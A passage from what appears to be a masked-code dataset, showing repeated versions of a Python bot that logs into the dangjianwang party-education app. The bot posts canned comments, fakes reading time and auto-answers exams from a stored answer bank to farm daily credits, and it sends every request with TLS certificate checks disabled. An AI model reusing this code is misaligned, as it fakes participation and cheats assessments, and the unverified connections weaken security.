'学习post1:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post2():\n data = {'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post2:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post3():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post3:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def get1():\n url = (\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'\n .format(self.token, mid))\n rjson = self.session.get(url=url)\n text = rjson.content\n soup = BeautifulSoup(text, 'html.parser')\n retContents = []\n for div in soup.find_all('p'):\n p = div.text.strip()\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\n return random.choice(retContents)\n\n def recordFeeling(content=None):\n if not content:\n content = (\n '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\n )\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'content': content}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习recordFeeling:{}'.format(rjson)\n self.writeLog2File(log)\n print('in recordFeeling')\n print(log)\n if rjson['code'] == '200':\n return {'content': content}\n elif rjson['code'] == '1120':\n addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',\n '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',\n '民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']\n return recordFeeling(content='{}\\n{}'.format(content,\n random.choice(addtion)))\n else:\n return None\n\n def readTime():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'time': interval}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习readTime:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n post1()\n time.sleep(1)\n post2()\n time.sleep(1)\n post3()\n time.sleep(1)\n content = get1()\n time.sleep(1)\n count = 0\n print('开始学习请稍后')\n for i in range(interval):\n count += 1\n if count % 30 == 0:\n print('已用时{}秒'.format(count))\n time.sleep(1)\n print('填写的学习体会', content)\n self.studyRsults.update(recordFeeling(content=content))\n time.sleep(1)\n readTime()\n time.sleep(1)\n pass\n\n def doExam(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n ids = []\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\n rjson = self.session.post(url=examlistUrl, data=data, verify=False\n ).json()\n time.sleep(0.3)\n print('*' * 99)\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\n rjson = self.session.post(url=banklistUrl, data=data, verify=False\n ).json()\n for i in rjson['data']:\n tem = i['bank_name'], i['id']\n self.examlist.append(tem)\n if i['bank_name'] == '十九大报告100题(单选)':\n temp = {'title': i['bank_name'], 'detail': i['detail'],\n 'id': i['id']}\n self.examC19Info.append(temp)\n time.sleep(0.3)\n print('*' * 99)\n data = {'bank': '6', 'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n aa = rjson['data']\n paper = aa['id']\n for i in aa['questions']:\n temp = {'id': i['id'], 'content': i['content']}\n ids.append(temp)\n print('*' * 99)\n time.sleep(0.5)\n answers = []\n for i in ids:\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[\n 0]\n answerText = correctAnswer.answerText\n answer = correctAnswer.answer\n temp = {'index': i['id'], 'answer': answer}\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\n self.qaList.append(qa)\n print(qa, i['content'])\n answers.append(temp)\n time.sleep(1)\n hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,\n 'answers': json.dumps(answers)}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\n rjson = self.session.post(url=commitUrl, data=hdata, verify=False\n ).json()\n print(rjson)\n print(self.examlist)\n print(self.examC19Info)\n print(self.qaList)\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Runner:\n\n def __init__(self, appid='TJZHDJ01', username='', password=''):\n urllib3.disable_warnings()\n self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')\n self.username = username\n self.password = password\n self.thumbedFilePath = './lib/'.format(username)\n self.logFilePath = './log/'.format(username)\n self.errFilePath = './err/'.format(username)\n self.thumbedFileList = []\n self.debug = True\n self.session = requests.session()\n self.appid = appid\n self.headers = {'User-Agent':\n 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'\n , 'header_version': '80', 'system': 'android', 'Connection':\n 'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}\n self.token = self.getToken()\n time.sleep(0.1)\n self.thumbPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])\n self.thumbPages = [i[1] for i in self.thumbPageList]\n time.sleep(0.1)\n self.helpPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Help/List'])\n self.helpPages = [i[1] for i in self.helpPageList]\n self.helpResults = {}\n time.sleep(0.1)\n self.studyPageList = self.getPagesII(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\n self.studyPages = [i[1] for i in self.studyPageList]\n time.sleep(0.1)\n self.studyRsults = {}\n self.thumbedPages = []\n self.thumbResults = {}\n self.helpedPages = []\n self.multiThumbed = []\n self.viewsResults = []\n self.examC19Info = []\n self.examlist = []\n self.qaList = []\n <mask token>\n\n def writeErr2File(self, err):\n path = self.logFilePath\n fullPath = '{}{}err.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, err))\n print('err已经写入{}'.format(fullPath))\n\n def writeLog2File(self, log):\n path = self.logFilePath\n fullPath = '{}{}logs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, log))\n print('log已经写入{}'.format(fullPath))\n\n def writeThumb2File(self, id):\n path = self.thumbedFilePath\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write(',{}'.format(id))\n print('点赞记录已经写入{}'.format(fullPath))\n\n def getThumbFromFile(self):\n \"\"\"\n\n :return: 文件中id组成的列表\n \"\"\"\n path = self.thumbedFilePath\n inFileList = []\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(fullPath):\n return fullPath\n with open(fullPath, 'r') as f:\n inFileList.extend(list(set(f.readlines()[0].split(','))))\n with open(fullPath, 'w') as f1:\n f1.write(','.join(sorted(inFileList)))\n return inFileList\n\n def getExcuteTimes(self):\n \"\"\"\n 返回点赞等自动执行的次数的字典\n :return:\n \"\"\"\n excuteTimes = {}\n credInfo = self.getCredItinfo()\n print(credInfo)\n currentScore = credInfo[0]\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\n thumbExcuteTimes = 10 - int(thumbScore)\n excuteTimes.update({'thumb': thumbExcuteTimes})\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\n helpExctuteTimes = 2 - int(helpScore)\n excuteTimes.update({'help': helpExctuteTimes})\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\n excuteTimes.update({'view': viewExcuteTimes})\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\n examExcuteTimes = int((4 - int(examScore)) / 2)\n excuteTimes.update({'exam': examExcuteTimes})\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]\n ['在线阅读学习资料'].split('/')[0])\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]\n ['学习资料写体会'].split('/')[0])\n examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0\n excuteTimes.update({'study': examExcuteTimes})\n return excuteTimes\n\n def getToken(self):\n \"\"\"\n 获得一个连接的token\n 每个连接都需要使用到\n :return:\n \"\"\"\n data = {'appid': self.appid, 'username': self.username, 'password':\n self.password}\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\n r = self.session.post(url=longinurl, data=data, verify=False)\n rjson = r.json()\n if rjson['code'] == '200':\n return rjson['token']\n else:\n print('token 获得失败')\n return None\n\n def getRJson(self, url):\n data = {'token': self.token, 'appid': self.appid}\n return self.session.post(url=url, data=data, verify=False).json()\n\n def getUserInfo(self):\n \"\"\"\n 获得一大串用户的信息,暂时没用\n :return:\n \"\"\"\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\n return self.getRJson(url=infoUrl)\n\n def getCredItinfoToday(self):\n \"\"\"\n 获得人员当前的得分等级参数\n :return:\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n info = self.getRJson(url=creditInfourl)\n fullScore = info['data']['full']\n gainScore = info['data']['gain']\n currentLevel = info['data']['level']\n username = info['data']['name']\n ret = {'fullScore': fullScore, 'gainScore': gainScore,\n 'currentLevel': currentLevel, 'username': username}\n return ret\n\n def getCredItinfo(self):\n \"\"\"\n 获得用户的今日积分状态\n 可用来判断是否需要再继续流程\n 数据如下\n ('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])\n :return:(haved_credit, credit_detail)\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n haved_credit = 0\n credit_detail = {}\n info = self.getRJson(url=creditInfourl)\n for k, v in info.items():\n if k == 'data':\n for k2, v2 in v.items():\n if k2 == 'haved_credit':\n haved_credit = v2\n if k2 == 'credit_detail':\n for i in v2:\n credit_detail.update({i['title']: i['score']})\n return haved_credit, credit_detail\n\n def getPages(self, urls):\n pages = []\n for url in urls:\n data = self.getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['title'], i['id']))\n return pages\n\n def getPagesII(self, urls):\n\n def getRJson(url):\n data = {'token': self.token, 'appid': self.appid, 'type_id':\n '791', 'page_index': '1'}\n return self.session.post(url=url, data=data, verify=False).json()\n pages = []\n for url in urls:\n data = getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['name'], i['id']))\n return pages\n\n def doThumb(self, id):\n \"\"\"\n 点赞函数,操作与id对应的页面\n 每次记录对应的信息到文件\n :return:\n \"\"\"\n contents = ['关注', '关注!', '关注!!']\n data = {'id': id, 'comment': random.choice(contents), 'token': self\n .token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n if rjson['code'] == '1003':\n self.token = self.getToken()\n elif rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.thumbedPages.append(id)\n for i in list(set(self.thumbPageList)):\n if id == i[1]:\n temp = {'title': i[0]}\n self.thumbResults.update(temp)\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data[\n 'comment'])\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.\n getCurrentTime(), i[0], data['comment'])\n write2File(self, './results/', 'result.txt', log)\n thumbInfo = {'title': i[0], 'reply': data['comment']}\n self.thumbPages.remove(id)\n self.writeThumb2File(id=id)\n return detail, thumbInfo\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\n print('因评论过快,等待一段时间')\n time.sleep(20)\n else:\n print('rjson', rjson)\n self.thumbedPages.remove(id)\n self.writeThumb2File(id=id)\n log = '点赞:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n time.sleep(10)\n\n def doHelp(self, id, callback=None):\n \"\"\"\n 互助功能\n :param id:\n :return:\n \"\"\"\n detail = ''\n helpInfo = None\n log = ''\n content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',\n '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']\n data = {'id': id, 'content': random.choice(content), 'token': self.\n token, 'appid': self.appid}\n print(data)\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.helpedPages.append(id)\n self.helpPages.remove(id)\n for i in self.helpPageList:\n if id == i[1]:\n curTime = self.getCurrentTime()\n self.helpResults.update({'title': id[0]})\n log = '互助:\\n主题: {}\\n提交内容: {}'.format(i[0], rjson[\n 'comment'])\n write2File(self, './results/', 'result.txt', log)\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[\n 0], rjson['comment'].strip())\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\n else:\n pass\n else:\n pass\n log = '帮助:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n return detail, log, helpInfo\n\n def doView(self):\n \"\"\"\n 党员视角发布功能\n\n :return:\n \"\"\"\n content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']\n data = {'content': random.choice(content), 'token': self.token,\n 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.viewsResults.append(1)\n else:\n pass\n log = '党员视角:{}'.format(rjson)\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson[\n 'data']['content'])\n publicContent = rjson['data']['content']\n return detail, publicContent\n\n def doStudy(self, mid):\n \"\"\"\n 前三个post函数的响应的三个请求\n get用来获得填写的内容\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\n :param mid:\n :return:\n \"\"\"\n interval = 60 * 5 + 5\n\n def post1():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post1:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post2():\n data = {'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post2:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post3():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post3:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def get1():\n url = (\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'\n .format(self.token, mid))\n rjson = self.session.get(url=url)\n text = rjson.content\n soup = BeautifulSoup(text, 'html.parser')\n retContents = []\n for div in soup.find_all('p'):\n p = div.text.strip()\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\n return random.choice(retContents)\n\n def recordFeeling(content=None):\n if not content:\n content = (\n '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\n )\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'content': content}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习recordFeeling:{}'.format(rjson)\n self.writeLog2File(log)\n print('in recordFeeling')\n print(log)\n if rjson['code'] == '200':\n return {'content': content}\n elif rjson['code'] == '1120':\n addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',\n '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',\n '民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']\n return recordFeeling(content='{}\\n{}'.format(content,\n random.choice(addtion)))\n else:\n return None\n\n def readTime():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'time': interval}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习readTime:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n post1()\n time.sleep(1)\n post2()\n time.sleep(1)\n post3()\n time.sleep(1)\n content = get1()\n time.sleep(1)\n count = 0\n print('开始学习请稍后')\n for i in range(interval):\n count += 1\n if count % 30 == 0:\n print('已用时{}秒'.format(count))\n time.sleep(1)\n print('填写的学习体会', content)\n self.studyRsults.update(recordFeeling(content=content))\n time.sleep(1)\n readTime()\n time.sleep(1)\n pass\n\n def doExam(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n ids = []\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\n rjson = self.session.post(url=examlistUrl, data=data, verify=False\n ).json()\n time.sleep(0.3)\n print('*' * 99)\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\n rjson = self.session.post(url=banklistUrl, data=data, verify=False\n ).json()\n for i in rjson['data']:\n tem = i['bank_name'], i['id']\n self.examlist.append(tem)\n if i['bank_name'] == '十九大报告100题(单选)':\n temp = {'title': i['bank_name'], 'detail': i['detail'],\n 'id': i['id']}\n self.examC19Info.append(temp)\n time.sleep(0.3)\n print('*' * 99)\n data = {'bank': '6', 'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n aa = rjson['data']\n paper = aa['id']\n for i in aa['questions']:\n temp = {'id': i['id'], 'content': i['content']}\n ids.append(temp)\n print('*' * 99)\n time.sleep(0.5)\n answers = []\n for i in ids:\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[\n 0]\n answerText = correctAnswer.answerText\n answer = correctAnswer.answer\n temp = {'index': i['id'], 'answer': answer}\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\n self.qaList.append(qa)\n print(qa, i['content'])\n answers.append(temp)\n time.sleep(1)\n hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,\n 'answers': json.dumps(answers)}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\n rjson = self.session.post(url=commitUrl, data=hdata, verify=False\n ).json()\n print(rjson)\n print(self.examlist)\n print(self.examC19Info)\n print(self.qaList)\n\n def getAnswerInfo(self):\n \"\"\"\n 获得答题的结果与正确率\n :return:\n \"\"\"\n data = {'token': self.token, 'appid': self.appid, 'page_size': '20',\n 'page_index': 'page_index'}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Runner:\n\n def __init__(self, appid='TJZHDJ01', username='', password=''):\n urllib3.disable_warnings()\n self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')\n self.username = username\n self.password = password\n self.thumbedFilePath = './lib/'.format(username)\n self.logFilePath = './log/'.format(username)\n self.errFilePath = './err/'.format(username)\n self.thumbedFileList = []\n self.debug = True\n self.session = requests.session()\n self.appid = appid\n self.headers = {'User-Agent':\n 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'\n , 'header_version': '80', 'system': 'android', 'Connection':\n 'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}\n self.token = self.getToken()\n time.sleep(0.1)\n self.thumbPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])\n self.thumbPages = [i[1] for i in self.thumbPageList]\n time.sleep(0.1)\n self.helpPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Help/List'])\n self.helpPages = [i[1] for i in self.helpPageList]\n self.helpResults = {}\n time.sleep(0.1)\n self.studyPageList = self.getPagesII(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\n self.studyPages = [i[1] for i in self.studyPageList]\n time.sleep(0.1)\n self.studyRsults = {}\n self.thumbedPages = []\n self.thumbResults = {}\n self.helpedPages = []\n self.multiThumbed = []\n self.viewsResults = []\n self.examC19Info = []\n self.examlist = []\n self.qaList = []\n\n def getCurrentTime(self):\n return datetime.datetime.now().strftime('%H:%M:%S')\n\n def writeErr2File(self, err):\n path = self.logFilePath\n fullPath = '{}{}err.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, err))\n print('err已经写入{}'.format(fullPath))\n\n def writeLog2File(self, log):\n path = self.logFilePath\n fullPath = '{}{}logs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, log))\n print('log已经写入{}'.format(fullPath))\n\n def writeThumb2File(self, id):\n path = self.thumbedFilePath\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write(',{}'.format(id))\n print('点赞记录已经写入{}'.format(fullPath))\n\n def getThumbFromFile(self):\n \"\"\"\n\n :return: 文件中id组成的列表\n \"\"\"\n path = self.thumbedFilePath\n inFileList = []\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(fullPath):\n return fullPath\n with open(fullPath, 'r') as f:\n inFileList.extend(list(set(f.readlines()[0].split(','))))\n with open(fullPath, 'w') as f1:\n f1.write(','.join(sorted(inFileList)))\n return inFileList\n\n def getExcuteTimes(self):\n \"\"\"\n 返回点赞等自动执行的次数的字典\n :return:\n \"\"\"\n excuteTimes = {}\n credInfo = self.getCredItinfo()\n print(credInfo)\n currentScore = credInfo[0]\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\n thumbExcuteTimes = 10 - int(thumbScore)\n excuteTimes.update({'thumb': thumbExcuteTimes})\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\n helpExctuteTimes = 2 - int(helpScore)\n excuteTimes.update({'help': helpExctuteTimes})\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\n excuteTimes.update({'view': viewExcuteTimes})\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\n examExcuteTimes = int((4 - int(examScore)) / 2)\n excuteTimes.update({'exam': examExcuteTimes})\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]\n ['在线阅读学习资料'].split('/')[0])\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]\n ['学习资料写体会'].split('/')[0])\n examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0\n excuteTimes.update({'study': examExcuteTimes})\n return excuteTimes\n\n def getToken(self):\n \"\"\"\n 获得一个连接的token\n 每个连接都需要使用到\n :return:\n \"\"\"\n data = {'appid': self.appid, 'username': self.username, 'password':\n self.password}\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\n r = self.session.post(url=longinurl, data=data, verify=False)\n rjson = r.json()\n if rjson['code'] == '200':\n return rjson['token']\n else:\n print('token 获得失败')\n return None\n\n def getRJson(self, url):\n data = {'token': self.token, 'appid': self.appid}\n return self.session.post(url=url, data=data, verify=False).json()\n\n def getUserInfo(self):\n \"\"\"\n 获得一大串用户的信息,暂时没用\n :return:\n \"\"\"\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\n return self.getRJson(url=infoUrl)\n\n def getCredItinfoToday(self):\n \"\"\"\n 获得人员当前的得分等级参数\n :return:\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n info = self.getRJson(url=creditInfourl)\n fullScore = info['data']['full']\n gainScore = info['data']['gain']\n currentLevel = info['data']['level']\n username = info['data']['name']\n ret = {'fullScore': fullScore, 'gainScore': gainScore,\n 'currentLevel': currentLevel, 'username': username}\n return ret\n\n def getCredItinfo(self):\n \"\"\"\n 获得用户的今日积分状态\n 可用来判断是否需要再继续流程\n 数据如下\n ('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])\n :return:(haved_credit, credit_detail)\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n haved_credit = 0\n credit_detail = {}\n info = self.getRJson(url=creditInfourl)\n for k, v in info.items():\n if k == 'data':\n for k2, v2 in v.items():\n if k2 == 'haved_credit':\n haved_credit = v2\n if k2 == 'credit_detail':\n for i in v2:\n credit_detail.update({i['title']: i['score']})\n return haved_credit, credit_detail\n\n def getPages(self, urls):\n pages = []\n for url in urls:\n data = self.getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['title'], i['id']))\n return pages\n\n def getPagesII(self, urls):\n\n def getRJson(url):\n data = {'token': self.token, 'appid': self.appid, 'type_id':\n '791', 'page_index': '1'}\n return self.session.post(url=url, data=data, verify=False).json()\n pages = []\n for url in urls:\n data = getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['name'], i['id']))\n return pages\n\n def doThumb(self, id):\n \"\"\"\n 点赞函数,操作与id对应的页面\n 每次记录对应的信息到文件\n :return:\n \"\"\"\n contents = ['关注', '关注!', '关注!!']\n data = {'id': id, 'comment': random.choice(contents), 'token': self\n .token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n if rjson['code'] == '1003':\n self.token = self.getToken()\n elif rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.thumbedPages.append(id)\n for i in list(set(self.thumbPageList)):\n if id == i[1]:\n temp = {'title': i[0]}\n self.thumbResults.update(temp)\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data[\n 'comment'])\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.\n getCurrentTime(), i[0], data['comment'])\n write2File(self, './results/', 'result.txt', log)\n thumbInfo = {'title': i[0], 'reply': data['comment']}\n self.thumbPages.remove(id)\n self.writeThumb2File(id=id)\n return detail, thumbInfo\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\n print('因评论过快,等待一段时间')\n time.sleep(20)\n else:\n print('rjson', rjson)\n self.thumbedPages.remove(id)\n self.writeThumb2File(id=id)\n log = '点赞:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n time.sleep(10)\n\n def doHelp(self, id, callback=None):\n \"\"\"\n 互助功能\n :param id:\n :return:\n \"\"\"\n detail = ''\n helpInfo = None\n log = ''\n content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',\n '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']\n data = {'id': id, 'content': random.choice(content), 'token': self.\n token, 'appid': self.appid}\n print(data)\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.helpedPages.append(id)\n self.helpPages.remove(id)\n for i in self.helpPageList:\n if id == i[1]:\n curTime = self.getCurrentTime()\n self.helpResults.update({'title': id[0]})\n log = '互助:\\n主题: 